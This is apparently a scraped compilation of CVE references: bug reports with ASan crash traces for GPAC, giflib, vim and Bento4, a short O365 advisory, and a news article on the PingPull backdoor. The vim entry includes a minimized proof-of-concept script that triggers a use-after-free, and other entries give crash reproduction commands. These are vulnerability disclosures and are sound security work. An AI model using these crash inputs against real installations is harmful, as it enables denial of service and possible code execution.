In GPAC MP4Box v1.1.0, there is a stack buffer overflow at src/utils/error.c:1769 which leads to a denial of service vulnerability.

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!

*   I looked for a similar issue and couldn't find any.
*   I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
*   I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...).

Step to reproduce:

1.get latest commit code (GPAC version 1.1.0-DEV-rev1216-gb39aa09c0-master)  
2.compile with --enable-sanitizer  
3.run MP4Box -add poc.nhml -new new.mp4  
Env:  
Ubunut 20.04 , clang 12.0.1

ASAN report  
poc.zip

    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==344428==ERROR: AddressSanitizer: SEGV on unknown address (pc 0x7fcb7d118779 bp 0x7ffe1832c550 sp 0x7ffe1832c480 T0)
    ==344428==The signal is caused by a READ memory access.
    ==344428==Hint: this fault was caused by a dereference of a high value address (see register values below).  Disassemble the provided pc to learn which register was used.
        #0 0x7fcb7d118779 in gf_blob_get /home/lly/pro/gpac_asan/src/utils/error.c:1769:12
        #1 0x7fcb7d0eb2ea in gf_fileio_from_blob /home/lly/pro/gpac_asan/src/utils/os_file.c:1287:13
        #2 0x7fcb7d0eb2ea in gf_fopen_ex /home/lly/pro/gpac_asan/src/utils/os_file.c:1314:14
        #3 0x7fcb7dc90328 in nhmldmx_send_sample /home/lly/pro/gpac_asan/src/filters/dmx_nhml.c:1101:9
        #4 0x7fcb7dc90328 in nhmldmx_process /home/lly/pro/gpac_asan/src/filters/dmx_nhml.c:1341:7
        #5 0x7fcb7dbbc997 in gf_filter_process_task /home/lly/pro/gpac_asan/src/filter_core/filter.c:2441:7
        #6 0x7fcb7db9e965 in gf_fs_thread_proc /home/lly/pro/gpac_asan/src/filter_core/filter_session.c:1664:3
        #7 0x7fcb7db9de60 in gf_fs_run /home/lly/pro/gpac_asan/src/filter_core/filter_session.c:1901:2
        #8 0x7fcb7d6bf708 in gf_media_import /home/lly/pro/gpac_asan/src/media_tools/media_import.c:1486:2
        #9 0x526ea9 in import_file /home/lly/pro/gpac_asan/applications/mp4box/fileimport.c:1289:7
        #10 0x4eb996 in do_add_cat /home/lly/pro/gpac_asan/applications/mp4box/main.c:4257:10
        #11 0x4e7d46 in mp4boxMain /home/lly/pro/gpac_asan/applications/mp4box/main.c:5746:13
        #12 0x7fcb7c9400b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
        #13 0x429a4d in _start (/home/lly/pro/gpac_asan/bin/gcc/MP4Box+0x429a4d)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV /home/lly/pro/gpac_asan/src/utils/error.c:1769:12 in gf_blob_get
    ==344428==ABORTING

CVE-2021-41458: SEGV on unknown address in MP4Box at src/utils/error.c:1769 in gf_blob_get · Issue #1910 · gpac/gpac

A memory leak (out-of-memory) in gif2rgb in util/gif2rgb.c in giflib 5.1.4 allows remote attackers trigger an out of memory exception or denial of service via a gif format file.

*   Summary
*   Files
*   Reviews
*   Support
*   Wiki
*   Mailing Lists
*   Code
*   Cvs
*   Tickets ▾
    *   Bugs
    *   Feature Requests
    *   Support Requests
    *   Patches
*   News
*   Discussion

Menu ▾ ▴

Status: open

Owner: nobody

Labels: None

Priority: 1

Updated: 2021-09-02

Created: 2021-09-02

Private: No

**System Env**

Ubuntu 16.04(server)

Kernel: _Linux ubuntu 5.0.5-050005-generic #201903271212 SMP Wed Mar 27 16:14:07 UTC 2019 x8664 x8664 x8664 GNU/Linux_

gif2rgb 5.14

gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)

**Configure**

export CFLAGS="-g -fsanitize=address -fno-omit-frame-pointer" \\  
export LDFLAGS="-g -fsanitize=address -fno-omit-frame-pointer"

**Command**

./gif2rgb @@

**Output**

\[ 4389.814860\] Call Trace:
\[ 4389.815518\]  dump\_stack+0x63/0x8a
\[ 4389.815529\]  dump\_header+0x54/0x308
\[ 4389.815540\]  ? sched\_clock+0x9/0x10
\[ 4389.815549\]  oom\_kill\_process.cold.29+0xb/0x1d6
\[ 4389.815558\]  out\_of\_memory+0x1bc/0x480
\[ 4389.815568\]  \_\_alloc\_pages\_slowpath+0xb68/0xea0
\[ 4389.815578\]  \_\_alloc\_pages\_nodemask+0x2c4/0x2e0
\[ 4389.815589\]  alloc\_pages\_current+0x81/0xe0
\[ 4389.815599\]  \_\_page\_cache\_alloc+0x6a/0xa0
\[ 4389.815609\]  filemap\_fault+0x403/0x8a0
\[ 4389.815619\]  ? xas\_load+0xc/0x80
\[ 4389.815628\]  ? xas\_find+0x157/0x190
\[ 4389.815637\]  ? filemap\_map\_pages+0x84/0x380
\[ 4389.815647\]  ext4\_filemap\_fault+0x31/0x44
\[ 4389.815657\]  \_\_do\_fault+0x3c/0x130
\[ 4389.815667\]  \_\_handle\_mm\_fault+0xe4b/0x1280
\[ 4389.815677\]  ? \_\_switch\_to\_asm+0x34/0x70
\[ 4389.815687\]  handle\_mm\_fault+0xe1/0x210
\[ 4389.815696\]  \_\_do\_page\_fault+0x23a/0x4c0
\[ 4389.815706\]  do\_page\_fault+0x2e/0xe0
\[ 4389.815715\]  ? page\_fault+0x8/0x30
\[ 4389.815723\]  page\_fault+0x1e/0x30
\[ 4389.815743\] RIP: 0033:0x560d4760fed8
\[ 4389.815755\] Code: Bad RIP value.
\[ 4389.815763\] RSP: 002b:000000c420251cb0 EFLAGS: 00010283
\[ 4389.815771\] RAX: 0000560d491fcde0 RBX: 0000000000000001 RCX: 0000560d48a716c0
\[ 4389.815780\] RDX: 0000000000000018 RSI: 40442b34b36c38f7 RDI: 000000c420413970
\[ 4389.815788\] RBP: 000000c420251ce0 R08: 00007fff4c5c30b0 R09: 00007fff4c5c3080
\[ 4389.815796\] R10: 00000000000a1c8e R11: 0000000000001125 R12: 0000000000000000
\[ 4389.815803\] R13: 0000000000000018 R14: 0000000000000054 R15: 0000000000000100
\[ 4389.815812\] Mem-Info:
\[ 4389.815823\] active\_anon:772579 inactive\_anon:154814 isolated\_anon:0
                active\_file:14 inactive\_file:19 isolated\_file:0
                unevictable:0 dirty:0 writeback:0 unstable:0
                slab\_reclaimable:9443 slab\_unreclaimable:19149
                mapped:21 shmem:1 pagetables:4096 bounce:0
                free:21609 free\_pcp:0 free\_cma:0
\[ 4389.815832\] Node 0 active\_anon:3090316kB inactive\_anon:619256kB active\_file:56kB inactive\_file:76kB unevictable:0kB isolated(anon):0kB isolated(file):0kB mapped:84kB dirty:0kB writeback:0kB shmem:4kB shmem\_thp: 0kB shmem\_pmdmapped: 0kB anon\_thp: 0kB writeback\_tmp:0kB unstable:0kB all\_unreclaimable? yes
\[ 4389.815840\] Node 0 DMA free:15620kB min:268kB low:332kB high:396kB active\_anon:252kB inactive\_anon:0kB active\_file:0kB inactive\_file:0kB unevictable:0kB writepending:0kB present:15988kB managed:15904kB mlocked:0kB kernel\_stack:0kB pagetables:0kB bounce:0kB free\_pcp:0kB local\_pcp:0kB free\_cma:0kB
\[ 4389.815850\] lowmem\_reserve\[\]: 0 2908 3843 3843 3843
\[ 4389.815859\] Node 0 DMA32 free:54632kB min:50932kB low:63664kB high:76396kB active\_anon:2357544kB inactive\_anon:618328kB active\_file:112kB inactive\_file:224kB unevictable:0kB writepending:0kB present:3129152kB managed:3039312kB mlocked:0kB kernel\_stack:16kB pagetables:7248kB bounce:0kB free\_pcp:0kB local\_pcp:0kB free\_cma:0kB
…….
\[ 4389.815932\] Node 0 hugepages\_total\=0 hugepages\_free\=0 hugepages\_surp\=0 hugepages\_size\=1048576kB
\[ 4389.815940\] Node 0 hugepages\_total\=0 hugepages\_free\=0 hugepages\_surp\=0 hugepages\_size\=2048kB
\[ 4389.815948\] 116 total pagecache pages
\[ 4389.815957\] 25 pages in swap cache
\[ 4389.815965\] Swap cache stats: add 1380554, delete 1380498, find 9812/20857
\[ 4389.815973\] Free swap  \= 0kB
\[ 4389.815981\] Total swap \= 998396kB
\[ 4389.815989\] 1048429 pages RAM
\[ 4389.815996\] 0 pages HighMem/MovableOnly
\[ 4389.816004\] 45224 pages reserved
\[ 4389.816012\] 0 pages cma reserved
\[ 4389.816019\] 0 pages hwpoisoned
\[ 4389.816027\] Tasks state (memory values in pages):
\[ 4389.816035\] \[  pid  \]   uid  tgid total\_vm      rss pgtables\_bytes swapents oom\_score\_adj name
    ……
\[ 4389.817580\] \[   1640\]     0  1640     5702        1    90112      477             0 bash
\[ 4389.817588\] \[   1901\]     0  1901    24862        9   233472      238             0 sshd
\[ 4389.817597\] \[   1956\]     0  1956     5724       61    86016      439             0 bash
\[ 4389.817607\] \[   2416\]     0  2416 5368727780   926778 11087872   221610             0 gif2rgb
\[ 4389.817615\] oom-kill:constraint\=CONSTRAINT\_NONE,nodemask\=(null),cpuset\=/,mems\_allowed\=0,global\_oom,task\_memcg\=/user.slice,task\=gif2rgb,pid\=2416,uid\=0
\[ 4389.817643\] Out of memory: Kill process 2416 (gif2rgb) score 918 or sacrifice child
\[ 4389.819906\] Killed process 2416 (gif2rgb) total-vm:21474911120kB, anon-rss:3707108kB, file-rss:4kB, shmem-rss:0kB
\[ 4389.912731\] oom\_reaper: reaped process 2416 (gif2rgb), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB

**1 Attachments**

**Discussion**

Log in to post a comment.

CVE-2021-40633: GIFLIB / Bugs / #157 An OutofMemory-Exception or Memory Leak in gif2rgb

A vulnerability was found in Microsoft O365 and classified as critical. This issue affects the Conditional Access Policy which leads to improper access controls. By default the policy is not verified for every request. The attack may be initiated remotely. Exploit details have been disclosed to the public. It is recommended to change the configuration settings. NOTE: Vendor claims that pre-requisites are very high, the feature works as intended, and that configuration settings might mitigate the issue.

CVE-2022-2077: Suspected Russian Activity Targeting Government and Business Entities Around the Globe

A Chinese advanced persistent threat (APT) known as Gallium has been observed using a previously undocumented remote access trojan in its espionage attacks targeting companies operating in Southeast Asia, Europe, and Africa.
Called PingPull, the "difficult-to-detect" backdoor is notable for its use of the Internet Control Message Protocol (ICMP) for command-and-control (C2) communications,

A Chinese advanced persistent threat (APT) known as Gallium has been observed using a previously undocumented remote access trojan in its espionage attacks targeting companies operating in Southeast Asia, Europe, and Africa.

Called **PingPull**, the "difficult-to-detect" backdoor is notable for its use of the Internet Control Message Protocol (ICMP) for command-and-control (C2) communications, according to new research published by Palo Alto Networks Unit 42 today.

Gallium is known for its attacks primarily aimed at telecom companies dating as far back as 2012. Also tracked under the name Soft Cell by Cybereason, the state-sponsored actor has been connected to a broader set of attacks targeting five major telecom companies located in Southeast Asian countries since 2017.

Over the past year, however, the group is said to have expanded its victimology footprint to include financial institutions and government entities located in Afghanistan, Australia, Belgium, Cambodia, Malaysia, Mozambique, the Philippines, Russia, and Vietnam.

PingPull, a Visual C++-based malware, provides a threat actor the ability to access a reverse shell and run arbitrary commands on a compromised host. This encompasses carrying out file operations, enumerating storage volumes, and timestomping files.

"PingPull samples that use ICMP for C2 communications issue ICMP Echo Request (ping) packets to the C2 server," the researchers detailed. "The C2 server will reply to these Echo requests with an Echo Reply packet to issue commands to the system."

Also identified are PingPull variants that rely on HTTPS and TCP to communicate with its C2 server instead of ICMP and over 170 IP addresses associated with the group since late 2020.

It's not immediately clear how the targeted networks are breached, although the threat actor is known to exploit internet-exposed applications to gain an initial foothold and deploy a modified version of the China Chopper web shell to establish persistence.

"Gallium remains an active threat to telecommunications, finance and government organizations across Southeast Asia, Europe and Africa," the researchers noted.

"While the use of ICMP tunneling is not a new technique, PingPull uses ICMP to make it more difficult to detect its C2 communications, as few organizations implement inspection of ICMP traffic on their networks."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Chinese 'Gallium' Hackers Using New PingPull Malware in Cyberespionage Attacks

Use After Free in GitHub repository vim/vim prior to 8.2.

**Description**

When fuzzing vim commit 1d97db3d9 (works with latest build and latest commit 3760bfddc per this time of this report), I discovered a use after free.

**Proof of Concept**

Here is the minimized poc

    spe!ﬂ
    norm0z=
    norm0yy
    no0 P]svc
    sil!norm0
    norm0
    

How to build

    LD=lld AS=llvm-as AR=llvm-ar RANLIB=llvm-ranlib CC=clang CXX=clang++ CFLAGS="-fsanitize=address" CXXFLAGS="-fsanitize=address" LDFLAGS="-ldl -fsanitize=address" ./configure --with-features=huge --enable-gui=none
    make -j$(nproc)
    

Proof of Concept

Run crafted file with this command

./vim -u NONE -X -Z -e -s -S poc_skipwhite -c :qa!

ASan stack trace:

    aldo@vps:~/vim/src$ ASAN_OPTIONS=symbolize=1 ASAN_SYMBOLIZER_PATH=/usr/bin/llvm-symbolizer ./vim -u NONE -X -Z -e -s -S poc_skipwhite -c :qa!
    =================================================================
    ==3075856==ERROR: AddressSanitizer: heap-use-after-free on address 0x60200000a6b0 at pc 0x000000ecfe2d bp 0x7fffffff6310 sp 0x7fffffff6308
    READ of size 1 at 0x60200000a6b0 thread T0
        #0 0xecfe2c in skipwhite /home/aldo/vimtes/src/charset.c:1428:12
        #1 0xb6e45f in spell_move_to /home/aldo/vimtes/src/spell.c:1490:11
        #2 0x924ea0 in nv_brackets /home/aldo/vimtes/src/normal.c:4580:10
        #3 0x8ffa60 in normal_cmd /home/aldo/vimtes/src/normal.c:939:5
        #4 0xee6537 in main_loop /home/aldo/vimtes/src/main.c:1516:3
        #5 0x737610 in open_cmdwin /home/aldo/vimtes/src/ex_getln.c:4528:5
        #6 0x7273f3 in getcmdline_int /home/aldo/vimtes/src/ex_getln.c:1952:7
        #7 0x723da8 in getcmdline /home/aldo/vimtes/src/ex_getln.c:1570:12
        #8 0x91bde8 in nv_search /home/aldo/vimtes/src/normal.c:4155:22
        #9 0x8ffa60 in normal_cmd /home/aldo/vimtes/src/normal.c:939:5
        #10 0x6ffb9d in exec_normal /home/aldo/vimtes/src/ex_docmd.c:8800:6
        #11 0x6ff7a3 in exec_normal_cmd /home/aldo/vimtes/src/ex_docmd.c:8763:5
        #12 0x6ff503 in ex_normal /home/aldo/vimtes/src/ex_docmd.c:8681:6
        #13 0x6da762 in do_one_cmd /home/aldo/vimtes/src/ex_docmd.c:2568:2
        #14 0x6ce492 in do_cmdline /home/aldo/vimtes/src/ex_docmd.c:992:17
        #15 0xb04ed5 in do_source_ext /home/aldo/vimtes/src/scriptfile.c:1674:5
        #16 0xb02920 in do_source /home/aldo/vimtes/src/scriptfile.c:1801:12
        #17 0xb02459 in cmd_source /home/aldo/vimtes/src/scriptfile.c:1174:14
        #18 0xb01f3d in ex_source /home/aldo/vimtes/src/scriptfile.c:1200:2
        #19 0x6da762 in do_one_cmd /home/aldo/vimtes/src/ex_docmd.c:2568:2
        #20 0x6ce492 in do_cmdline /home/aldo/vimtes/src/ex_docmd.c:992:17
        #21 0x6d1720 in do_cmdline_cmd /home/aldo/vimtes/src/ex_docmd.c:586:12
        #22 0xee5274 in exe_commands /home/aldo/vimtes/src/main.c:3106:2
        #23 0xee2fa9 in vim_main2 /home/aldo/vimtes/src/main.c:780:2
        #24 0xedc890 in main /home/aldo/vimtes/src/main.c:432:12
        #25 0x7ffff7824082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
        #26 0x41eded in _start (/home/aldo/vimtes/src/vim+0x41eded)
    
    0x60200000a6b0 is located 0 bytes inside of 1-byte region [0x60200000a6b0,0x60200000a6b1)
    freed by thread T0 here:
        #0 0x499a42 in free (/home/aldo/vimtes/src/vim+0x499a42)
        #1 0x4cb508 in vim_free /home/aldo/vimtes/src/alloc.c:621:2
        #2 0x880a6e in ml_flush_line /home/aldo/vimtes/src/memline.c:4063:2
        #3 0x88ee8c in ml_get_buf /home/aldo/vimtes/src/memline.c:2651:2
        #4 0xb6d6d7 in spell_move_to /home/aldo/vimtes/src/spell.c:1347:6
        #5 0x924ea0 in nv_brackets /home/aldo/vimtes/src/normal.c:4580:10
        #6 0x8ffa60 in normal_cmd /home/aldo/vimtes/src/normal.c:939:5
        #7 0xee6537 in main_loop /home/aldo/vimtes/src/main.c:1516:3
        #8 0x737610 in open_cmdwin /home/aldo/vimtes/src/ex_getln.c:4528:5
        #9 0x7273f3 in getcmdline_int /home/aldo/vimtes/src/ex_getln.c:1952:7
        #10 0x723da8 in getcmdline /home/aldo/vimtes/src/ex_getln.c:1570:12
        #11 0x91bde8 in nv_search /home/aldo/vimtes/src/normal.c:4155:22
        #12 0x8ffa60 in normal_cmd /home/aldo/vimtes/src/normal.c:939:5
        #13 0x6ffb9d in exec_normal /home/aldo/vimtes/src/ex_docmd.c:8800:6
        #14 0x6ff7a3 in exec_normal_cmd /home/aldo/vimtes/src/ex_docmd.c:8763:5
        #15 0x6ff503 in ex_normal /home/aldo/vimtes/src/ex_docmd.c:8681:6
        #16 0x6da762 in do_one_cmd /home/aldo/vimtes/src/ex_docmd.c:2568:2
        #17 0x6ce492 in do_cmdline /home/aldo/vimtes/src/ex_docmd.c:992:17
        #18 0xb04ed5 in do_source_ext /home/aldo/vimtes/src/scriptfile.c:1674:5
        #19 0xb02920 in do_source /home/aldo/vimtes/src/scriptfile.c:1801:12
        #20 0xb02459 in cmd_source /home/aldo/vimtes/src/scriptfile.c:1174:14
        #21 0xb01f3d in ex_source /home/aldo/vimtes/src/scriptfile.c:1200:2
        #22 0x6da762 in do_one_cmd /home/aldo/vimtes/src/ex_docmd.c:2568:2
        #23 0x6ce492 in do_cmdline /home/aldo/vimtes/src/ex_docmd.c:992:17
        #24 0x6d1720 in do_cmdline_cmd /home/aldo/vimtes/src/ex_docmd.c:586:12
        #25 0xee5274 in exe_commands /home/aldo/vimtes/src/main.c:3106:2
        #26 0xee2fa9 in vim_main2 /home/aldo/vimtes/src/main.c:780:2
        #27 0xedc890 in main /home/aldo/vimtes/src/main.c:432:12
        #28 0x7ffff7824082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
    
    previously allocated by thread T0 here:
        #0 0x499cad in malloc (/home/aldo/vimtes/src/vim+0x499cad)
        #1 0x4cb100 in lalloc /home/aldo/vimtes/src/alloc.c:246:11
        #2 0x4cb059 in alloc /home/aldo/vimtes/src/alloc.c:151:12
        #3 0xaca43c in do_put /home/aldo/vimtes/src/register.c:2126:14
        #4 0x935553 in nv_put_opt /home/aldo/vimtes/src/normal.c:7355:2
        #5 0x922656 in nv_put /home/aldo/vimtes/src/normal.c:7234:5
        #6 0x92cb00 in nv_zet /home/aldo/vimtes/src/normal.c:2823:16
        #7 0x8ffa60 in normal_cmd /home/aldo/vimtes/src/normal.c:939:5
        #8 0xee6537 in main_loop /home/aldo/vimtes/src/main.c:1516:3
        #9 0x737610 in open_cmdwin /home/aldo/vimtes/src/ex_getln.c:4528:5
        #10 0x7273f3 in getcmdline_int /home/aldo/vimtes/src/ex_getln.c:1952:7
        #11 0x723da8 in getcmdline /home/aldo/vimtes/src/ex_getln.c:1570:12
        #12 0x91bde8 in nv_search /home/aldo/vimtes/src/normal.c:4155:22
        #13 0x8ffa60 in normal_cmd /home/aldo/vimtes/src/normal.c:939:5
        #14 0x6ffb9d in exec_normal /home/aldo/vimtes/src/ex_docmd.c:8800:6
        #15 0x6ff7a3 in exec_normal_cmd /home/aldo/vimtes/src/ex_docmd.c:8763:5
        #16 0x6ff503 in ex_normal /home/aldo/vimtes/src/ex_docmd.c:8681:6
        #17 0x6da762 in do_one_cmd /home/aldo/vimtes/src/ex_docmd.c:2568:2
        #18 0x6ce492 in do_cmdline /home/aldo/vimtes/src/ex_docmd.c:992:17
        #19 0xb04ed5 in do_source_ext /home/aldo/vimtes/src/scriptfile.c:1674:5
        #20 0xb02920 in do_source /home/aldo/vimtes/src/scriptfile.c:1801:12
        #21 0xb02459 in cmd_source /home/aldo/vimtes/src/scriptfile.c:1174:14
        #22 0xb01f3d in ex_source /home/aldo/vimtes/src/scriptfile.c:1200:2
        #23 0x6da762 in do_one_cmd /home/aldo/vimtes/src/ex_docmd.c:2568:2
        #24 0x6ce492 in do_cmdline /home/aldo/vimtes/src/ex_docmd.c:992:17
        #25 0x6d1720 in do_cmdline_cmd /home/aldo/vimtes/src/ex_docmd.c:586:12
        #26 0xee5274 in exe_commands /home/aldo/vimtes/src/main.c:3106:2
        #27 0xee2fa9 in vim_main2 /home/aldo/vimtes/src/main.c:780:2
        #28 0xedc890 in main /home/aldo/vimtes/src/main.c:432:12
        #29 0x7ffff7824082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
    
    SUMMARY: AddressSanitizer: heap-use-after-free /home/aldo/vimtes/src/charset.c:1428:12 in skipwhite
    Shadow bytes around the buggy address:
      0x0c047fff9480: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
      0x0c047fff9490: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
      0x0c047fff94a0: fa fa fd fa fa fa fd fa fa fa fd fd fa fa fd fa
      0x0c047fff94b0: fa fa fd fa fa fa 02 fa fa fa 00 00 fa fa 02 fa
      0x0c047fff94c0: fa fa 02 fa fa fa 01 fa fa fa fd fa fa fa fd fa
    =>0x0c047fff94d0: fa fa 00 00 fa fa[fd]fa fa fa fd fa fa fa fd fa
      0x0c047fff94e0: fa fa fd fa fa fa 02 fa fa fa fa fa fa fa fa fa
      0x0c047fff94f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff9500: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff9510: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff9520: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==3075856==ABORTING
    

**Impact**

This vulnerability is capable of crashing software, Bypass Protection Mechanism, Modify Memory, and possible remote execution

CVE-2022-2042: use after free in skipwhite in vim

An issue was discovered in Bento4 v1.2. There is an allocation size request error in /Ap4RtpAtom.cpp.

SUMMARY: AddressSanitizer: requested allocation size 0xfffffffffffffffd in /Source/C++/Core/Ap4RtpAtom.cpp:49

*   Version

    $ ./mp42hls 
    MP4 To HLS File Converter - Version 1.2
    (Bento4 Version 1.6.0.0)
    (c) 2002-2018 Axiomatic Systems, LLC
    

branch d02ef82

*   Platform

    $ gcc --version
    gcc (Ubuntu 9.4.0-1ubuntu1~20.04.1) 9.4.0
    Copyright (C) 2019 Free Software Foundation, Inc.
    This is free software; see the source for copying conditions.  There is NO
    warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
    
    $ uname -r
    5.13.0-40-generic
    
    $ lsb_release -a
    No LSB modules are available.
    Distributor ID:	Ubuntu
    Description:	Ubuntu 20.04.4 LTS
    Release:	20.04
    Codename:	focal
    

*   Steps to reproduce

    $ mkdir build
    $ cd build
    $ cmake .. -DCMAKE_CXX_FLAGS="-fsanitize=address -g" -DCMAKE_C_FLAGS="-fsanitize=address -g" -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" -DCMAKE_MODULE_LINKER_FLAGS="-fsanitize=address"
    $ make
    
    $ ./mp42hls poc
    

*   Asan

    $ ./mp42hls poc
    =================================================================
    ==2656357==ERROR: AddressSanitizer: requested allocation size 0xfffffffffffffffd (0x800 after adjustments for alignment, red zones etc.) exceeds maximum supported size of 0x10000000000 (thread T0)
        #0 0x7f94774c8787 in operator new[](unsigned long) ../../../../src/libsanitizer/asan/asan_new_delete.cc:107
        #1 0x55c100eee930 in AP4_RtpAtom::AP4_RtpAtom(unsigned int, AP4_ByteStream&) /home/wulearn/Bento4/Source/C++/Core/Ap4RtpAtom.cpp:49
        #2 0x55c100e75f4d in AP4_RtpAtom::Create(unsigned int, AP4_ByteStream&) (/home/wulearn/Bento4/build/mp42hls+0x352f4d)
        #3 0x55c100e744da in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/wulearn/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:689
        #4 0x55c100e70f7a in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/wulearn/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234
        #5 0x55c100e70549 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, AP4_Atom*&) /home/wulearn/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:154
        #6 0x55c100ea1392 in AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) /home/wulearn/Bento4/Source/C++/Core/Ap4File.cpp:104
        #7 0x55c100ea0fe0 in AP4_File::AP4_File(AP4_ByteStream&, bool) /home/wulearn/Bento4/Source/C++/Core/Ap4File.cpp:78
        #8 0x55c100e5bb38 in main /home/wulearn/Bento4/Source/C++/Apps/Mp42Hls/Mp42Hls.cpp:1894
        #9 0x7f9476e9f0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x240b2)
    
    ==2656357==HINT: if you don't care about these errors you may set allocator_may_return_null=1
    SUMMARY: AddressSanitizer: allocation-size-too-big ../../../../src/libsanitizer/asan/asan_new_delete.cc:107 in operator new[](unsigned long)
    ==2656357==ABORTING
    

poc: poc.zip

Thanks!

CVE-2022-31287: requested allocation size 0xfffffffffffffffd in /Source/C++/Core/Ap4RtpAtom.cpp:49 · Issue #703 · axiomatic-systems/Bento4

An issue was discovered in Bento4 1.2. The allocator is out of memory in /Source/C++/Core/Ap4Array.h.

SUMMARY: AddressSanitizer: allocator is out of memory in /Source/C++/Core/Ap4Array.h:172

*   Version

    $ ./mp42hls 
    MP4 To HLS File Converter - Version 1.2
    (Bento4 Version 1.6.0.0)
    (c) 2002-2018 Axiomatic Systems, LLC
    

branch d02ef82

*   Platform

    $ gcc --version
    gcc (Ubuntu 9.4.0-1ubuntu1~20.04.1) 9.4.0
    Copyright (C) 2019 Free Software Foundation, Inc.
    This is free software; see the source for copying conditions.  There is NO
    warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
    
    $ uname -r
    5.13.0-40-generic
    
    $ lsb_release -a
    No LSB modules are available.
    Distributor ID:	Ubuntu
    Description:	Ubuntu 20.04.4 LTS
    Release:	20.04
    Codename:	focal
    

*   Steps to reproduce

    $ mkdir build
    $ cd build
    $ cmake .. -DCMAKE_CXX_FLAGS="-fsanitize=address -g" -DCMAKE_C_FLAGS="-fsanitize=address -g" -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" -DCMAKE_MODULE_LINKER_FLAGS="-fsanitize=address"
    $ make
    
    $ ./mp42hls poc
    

*   Asan

    $ ./mp42hls poc
    =================================================================
    ==2569847==ERROR: AddressSanitizer: allocator is out of memory trying to allocate 0x64f7ff3b0 bytes
        #0 0x7f4dacc42587 in operator new(unsigned long) ../../../../src/libsanitizer/asan/asan_new_delete.cc:104
        #1 0x55b48862ff7c in AP4_Array<AP4_TrunAtom::Entry>::EnsureCapacity(unsigned int) (/home/wulearn/Bento4/build/mp42hls+0x40af7c)
        #2 0x55b48862fcf0 in AP4_Array<AP4_TrunAtom::Entry>::SetItemCount(unsigned int) /home/wulearn/Bento4/Source/C++/Core/Ap4Array.h:210
        #3 0x55b48862e470 in AP4_TrunAtom::AP4_TrunAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&) /home/wulearn/Bento4/Source/C++/Core/Ap4TrunAtom.cpp:127
        #4 0x55b48862de8a in AP4_TrunAtom::Create(unsigned int, AP4_ByteStream&) /home/wulearn/Bento4/Source/C++/Core/Ap4TrunAtom.cpp:51
        #5 0x55b4885751ab in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/wulearn/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:438
        #6 0x55b488572f7a in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/wulearn/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234
        #7 0x55b488572549 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, AP4_Atom*&) /home/wulearn/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:154
        #8 0x55b4885a3392 in AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) /home/wulearn/Bento4/Source/C++/Core/Ap4File.cpp:104
        #9 0x55b4885a2fe0 in AP4_File::AP4_File(AP4_ByteStream&, bool) /home/wulearn/Bento4/Source/C++/Core/Ap4File.cpp:78
        #10 0x55b48855db38 in main /home/wulearn/Bento4/Source/C++/Apps/Mp42Hls/Mp42Hls.cpp:1894
        #11 0x7f4dac6190b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x240b2)
    
    ==2569847==HINT: if you don't care about these errors you may set allocator_may_return_null=1
    SUMMARY: AddressSanitizer: out-of-memory ../../../../src/libsanitizer/asan/asan_new_delete.cc:104 in operator new(unsigned long)
    ==2569847==ABORTING
    

poc: poc.zip

Thanks!

CVE-2022-31285: allocator is out of memory in /Source/C++/Core/Ap4Array.h:172 · Issue #702 · axiomatic-systems/Bento4

